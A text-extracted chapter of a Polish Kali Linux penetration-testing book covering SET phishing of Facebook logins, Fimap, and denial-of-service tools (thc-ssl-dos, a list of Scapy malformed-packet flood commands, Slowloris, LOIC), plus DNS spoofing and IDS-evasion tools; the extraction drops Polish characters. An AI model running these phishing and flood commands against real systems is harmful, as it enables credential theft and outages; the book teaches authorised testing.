Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

